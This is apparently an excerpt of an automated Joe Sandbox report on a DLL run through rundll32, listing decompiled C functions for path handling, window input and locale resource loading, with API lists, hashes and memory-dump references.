                                                                        0x1001dcae
                                                                        0x1001dcae
                                                                        0x1001dcae
                                                                        0x1001dcb4
                                                                        0x1001dd7c
                                                                        0x1001dd82
                                                                        0x1001dd8a
                                                                        0x1001dd8a
                                                                        0x1001dcba
                                                                        0x1001dcd4
                                                                        0x1001dcd4
                                                                        0x1001dcd9
                                                                        0x1001dcdb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dcbe
                                                                        0x1001dcc0
                                                                        0x1001dce5
                                                                        0x1001dce5
                                                                        0x1001dceb
                                                                        0x1001dcf5
                                                                        0x1001dcf5
                                                                        0x1001dcfb
                                                                        0x1001dd0a
                                                                        0x1001dd0a
                                                                        0x1001dd0a
                                                                        0x1001dd0c
                                                                        0x1001dd0c
                                                                        0x1001dd10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd12
                                                                        0x1001dd14
                                                                        0x1001dd76
                                                                        0x1001dd77
                                                                        0x00000000
                                                                        0x1001dd77
                                                                        0x1001dd16
                                                                        0x1001dd1c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd1e
                                                                        0x1001dd24
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd26
                                                                        0x1001dd2c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd2e
                                                                        0x1001dd34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd36
                                                                        0x1001dd3c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd3e
                                                                        0x1001dd44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd46
                                                                        0x1001dd4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd4e
                                                                        0x1001dd54
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd56
                                                                        0x1001dd5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd5e
                                                                        0x1001dd64
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd66
                                                                        0x1001dd6c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd6e
                                                                        0x1001dd74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd74
                                                                        0x1001dcfd
                                                                        0x1001dd03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd05
                                                                        0x1001dd07
                                                                        0x00000000
                                                                        0x1001dd07
                                                                        0x1001dced
                                                                        0x1001dcf3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dcf3
                                                                        0x1001dcc2
                                                                        0x1001dcc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dcd3
                                                                        0x1001dcd3
                                                                        0x1001dcdd
                                                                        0x1001dcdf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dcdf

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
                                                                        • String ID: $($?$@
                                                                        • API String ID: 986702660-3087990773
                                                                        • Opcode ID: 730b00cf02757afbb45aa2589ad9d443bed1e78584191d63332f96461586f59c
                                                                        • Instruction ID: 1dbbc6cbb32d877c3bf6b6c124918af026ae206f3974ca55ec8039dacab70468
                                                                        • Opcode Fuzzy Hash: 730b00cf02757afbb45aa2589ad9d443bed1e78584191d63332f96461586f59c
                                                                        • Instruction Fuzzy Hash: 18B1CD71E007269FEF51FF64C884B9EBBB1EB04344F11456AEA56AE1A2D774E8C0CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002592C Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002592C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E10011BF0(0x1003acd2, _t76);
				_t33 =  *0x1004c470; // 0x1bfbe703
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E100243B2();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E100258EA(0, _t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}











                                                                        0x10025931
                                                                        0x1002593c
                                                                        0x10025944
                                                                        0x10025947
                                                                        0x1002595b
                                                                        0x10025965
                                                                        0x10025976
                                                                        0x1002597f
                                                                        0x10025984
                                                                        0x1002598e
                                                                        0x10025996
                                                                        0x10025999
                                                                        0x100259a9
                                                                        0x10025a44
                                                                        0x10025a46
                                                                        0x100259af
                                                                        0x100259cd
                                                                        0x100259da
                                                                        0x100259dd
                                                                        0x100259dd
                                                                        0x100259ea
                                                                        0x00000000
                                                                        0x100259ec
                                                                        0x100259f6
                                                                        0x100259ff
                                                                        0x00000000
                                                                        0x10025a01
                                                                        0x10025a02
                                                                        0x10025a0e
                                                                        0x00000000
                                                                        0x10025a31
                                                                        0x10025a3e
                                                                        0x00000000
                                                                        0x10025a3e
                                                                        0x10025a0e
                                                                        0x100259ff
                                                                        0x100259cf
                                                                        0x100259cf
                                                                        0x100259cf
                                                                        0x100259cf
                                                                        0x100259cd
                                                                        0x10025a4d
                                                                        0x10025a52
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10025967
                                                                        0x1002596c
                                                                        0x10025978
                                                                        0x10025978
                                                                        0x10025978
                                                                        0x10025a59
                                                                        0x10025a6a

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10025931
                                                                        • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                        • lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                          • Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
                                                                          • Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916
                                                                        • PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
                                                                        • CharUpperA.USER32(?), ref: 100259DD
                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 100259F6
                                                                        • FindClose.KERNEL32(00000000), ref: 10025A02
                                                                        • lstrlenA.KERNEL32(?), ref: 10025A1F
                                                                        • lstrcpyA.KERNEL32(?,?), ref: 10025A3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                        • String ID:
                                                                        • API String ID: 4080879615-0
                                                                        • Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                        • Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
                                                                        • Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                        • Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002FE1B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 164keyboardtimeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 81%
                                                                        			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed char _v69;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t77;
				short _t78;
				short _t85;
				short _t90;
				intOrPtr _t109;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr* _t116;

				_t113 = _a4;
				_t116 = __ecx;
				if(E10020B0B(__ecx, _t113) != 0) {
					L37:
					return 1;
				}
				_t114 =  *((intOrPtr*)(_t113 + 4));
				_v20 = E10008325(__ecx);
				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
					if(_t114 < 0x200 || _t114 > 0x209) {
						if(_t114 < 0xa0 || _t114 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E100373DB();
						_t70 = _a4;
						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
						_v28.x =  *(_t70 + 0x14);
						ScreenToClient( *(_t116 + 0x1c),  &_v28);
						E10011C50( &_v76, 0, 0x30);
						_v76 = 0x28;
						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
						_t128 = _v40 - 0xffffffff;
						_v8 = _t77;
						if(_v40 != 0xffffffff) {
							_push(_v40);
							E100107C8(0x201, _t114, _t116, _t128);
						}
						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							__eflags = _t114 - 0x201;
							if(_t114 != 0x201) {
								_t90 = GetKeyState(1);
								__eflags = _t90;
								if(_t90 < 0) {
									_v8 =  *((intOrPtr*)(_v16 + 0x78));
								}
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							_t78 = GetKeyState(1);
							__eflags = _t78;
							if(_t78 >= 0) {
								L28:
								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
								KillTimer( *(_t116 + 0x1c), 0xe001);
								goto L29;
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L29;
							}
							goto L28;
						} else {
							if(_t114 != 0x202) {
								__eflags =  *(_t116 + 0x78) & 0x00000008;
								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
									L25:
									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
									L29:
									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
									goto L30;
								}
								_t85 = GetKeyState(1);
								__eflags = _t85;
								if(_t85 < 0) {
									goto L25;
								}
								_t109 = _v16;
								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
									goto L29;
								}
								_push(0x12c);
								_push(0xe000);
								L24:
								E1002F4CC(_t116);
								goto L29;
							}
							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L24;
						}
					}
				} else {
					L30:
					_t62 = E10022AD5(_t116);
					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
						if(_v20 == 0) {
							L35:
							if(IsWindow( *(_t116 + 0x1c)) == 0) {
								goto L38;
							}
							return E10021527(_a4);
						} else {
							goto L33;
						}
						while(1) {
							L33:
							_t115 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
								goto L37;
							}
							_t68 = E10022A96(_t115);
							_v20 = _t68;
							if(_t68 != 0) {
								continue;
							}
							goto L35;
						}
						goto L37;
					} else {
						L38:
						__eflags = 0;
						return 0;
					}
				}
			}

























                                                                        0x1002fe23
                                                                        0x1002fe27
                                                                        0x1002fe30
                                                                        0x1003000b
                                                                        0x00000000
                                                                        0x1003000d
                                                                        0x1002fe36
                                                                        0x1002fe45
                                                                        0x1002fe4d
                                                                        0x1002fe65
                                                                        0x1002fe75
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002fe87
                                                                        0x1002fe87
                                                                        0x1002fe8c
                                                                        0x1002fe8f
                                                                        0x1002fe98
                                                                        0x1002fea2
                                                                        0x1002fea5
                                                                        0x1002feb3
                                                                        0x1002fec9
                                                                        0x1002fed0
                                                                        0x1002fed3
                                                                        0x1002fed7
                                                                        0x1002feda
                                                                        0x1002fedc
                                                                        0x1002fedf
                                                                        0x1002fee4
                                                                        0x1002fee7
                                                                        0x1002fef8
                                                                        0x1002fefc
                                                                        0x1002fefe
                                                                        0x1002ff02
                                                                        0x1002ff08
                                                                        0x1002ff0b
                                                                        0x1002ff13
                                                                        0x1002ff13
                                                                        0x1002ff0b
                                                                        0x1002feef
                                                                        0x1002feef
                                                                        0x1002feef
                                                                        0x1002ff1a
                                                                        0x1002ff84
                                                                        0x1002ff8a
                                                                        0x1002ff8d
                                                                        0x1002ff95
                                                                        0x1002ff9b
                                                                        0x1002ffa9
                                                                        0x00000000
                                                                        0x1002ffa9
                                                                        0x1002ff8f
                                                                        0x1002ff93
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ff22
                                                                        0x1002ff28
                                                                        0x1002ff42
                                                                        0x1002ff46
                                                                        0x1002ff73
                                                                        0x1002ff7a
                                                                        0x1002ffaf
                                                                        0x1002ffb5
                                                                        0x00000000
                                                                        0x1002ffb5
                                                                        0x1002ff4a
                                                                        0x1002ff50
                                                                        0x1002ff53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ff58
                                                                        0x1002ff5b
                                                                        0x1002ff5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ff60
                                                                        0x1002ff65
                                                                        0x1002ff6a
                                                                        0x1002ff6c
                                                                        0x00000000
                                                                        0x1002ff6c
                                                                        0x1002ff30
                                                                        0x1002ff36
                                                                        0x1002ff3b
                                                                        0x00000000
                                                                        0x1002ff3b
                                                                        0x1002ff1a
                                                                        0x1002ffb8
                                                                        0x1002ffb8
                                                                        0x1002ffba
                                                                        0x1002ffc2
                                                                        0x1002ffce
                                                                        0x1002fff2
                                                                        0x1002fffd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ffd0
                                                                        0x1002ffd0
                                                                        0x1002ffd0
                                                                        0x1002ffd3
                                                                        0x1002ffe2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ffe6
                                                                        0x1002ffed
                                                                        0x1002fff0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002fff0
                                                                        0x00000000
                                                                        0x10030010
                                                                        0x10030010
                                                                        0x10030010
                                                                        0x00000000
                                                                        0x10030010
                                                                        0x1002ffc2

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: State$ClientKillParentScreenTimerWindow
                                                                        • String ID: (
                                                                        • API String ID: 1540673551-3887548279
                                                                        • Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                        • Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
                                                                        • Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                        • Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10032A2D Relevance: 10.6, APIs: 7, Instructions: 67windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E10032A2D(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}








                                                                        0x10032a30
                                                                        0x10032a3c
                                                                        0x10032a43
                                                                        0x10032a45
                                                                        0x10032a47
                                                                        0x10032a47
                                                                        0x10032a53
                                                                        0x10032a55
                                                                        0x10032a57
                                                                        0x10032a57
                                                                        0x10032a64
                                                                        0x10032a6e
                                                                        0x10032a71
                                                                        0x10032a9d
                                                                        0x10032a9f
                                                                        0x10032ab0
                                                                        0x10032aba
                                                                        0x10032aba
                                                                        0x10032a73
                                                                        0x10032a90
                                                                        0x10032a90
                                                                        0x10032acd

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendState$DesktopFocusParentWindow
                                                                        • String ID:
                                                                        • API String ID: 4150626516-0
                                                                        • Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                        • Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
                                                                        • Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                        • Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100348C4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;

				_t22 = __esi;
				_t20 = __ecx;
				_t19 = __ebx;
				_t27 = _a8 - 0x800;
				_t10 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t10;
				if(_a8 != 0x800) {
					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t22);
					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E100117AE(_t12, _v8);
			}










                                                                        0x100348c4
                                                                        0x100348c4
                                                                        0x100348c4
                                                                        0x100348cd
                                                                        0x100348d4
                                                                        0x100348d9
                                                                        0x100348df
                                                                        0x10034930
                                                                        0x10034932
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034934
                                                                        0x100348e1
                                                                        0x100348e7
                                                                        0x100348ed
                                                                        0x100348ed
                                                                        0x10034902
                                                                        0x1003490d
                                                                        0x10034936
                                                                        0x10034936
                                                                        0x10034913
                                                                        0x1003491a
                                                                        0x1003491a
                                                                        0x10034938
                                                                        0x10034942

                                                                        APIs
                                                                        • lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
                                                                        • LoadLibraryA.KERNEL32(?), ref: 1003491A
                                                                        • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLibraryLoadLocalelstrcpy
                                                                        • String ID: LOC
                                                                        • API String ID: 864663389-519433814
                                                                        • Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                        • Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
                                                                        • Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                        • Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10034959 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				void* _t47;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t95;
				signed int _t99;
				int _t100;
				int _t101;
				void* _t105;
				void* _t109;

				_t42 =  *0x1004c470; // 0x1bfbe703
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
							_t105 = 1;
							_t99 = 0;
							if(1 <= _t85) {
								L16:
								_t47 = 0;
								L17:
								return E100117AE(_t47, _v8);
							} else {
								goto L14;
							}
							while(1) {
								L14:
								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
								_pop(_t88);
								if(_t47 != _t85) {
									goto L17;
								}
								_t99 =  &(1[_t99]);
								if(_t99 < _t105) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_t88 =  &_v28;
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t88 = _t50 & 0x000003ff;
						_t100 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
						_v60 = ConvertDefaultLocale(_t100);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t88 = _t66 & 0x000003ff;
							_t101 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
							_t70 = ConvertDefaultLocale(_t101);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t95 = _t72 & 0x3ff;
				_v32 = _t95;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t88 = _t79 & 0x000003ff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}



































                                                                        0x1003495f
                                                                        0x1003496d
                                                                        0x10034974
                                                                        0x10034977
                                                                        0x1003497c
                                                                        0x10034984
                                                                        0x10034987
                                                                        0x1003498f
                                                                        0x10034a03
                                                                        0x10034ab0
                                                                        0x10034ab4
                                                                        0x10034afe
                                                                        0x10034afe
                                                                        0x10034b06
                                                                        0x10034b07
                                                                        0x10034b0b
                                                                        0x10034b24
                                                                        0x10034b24
                                                                        0x10034b26
                                                                        0x10034b32
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034b0d
                                                                        0x10034b0d
                                                                        0x10034b14
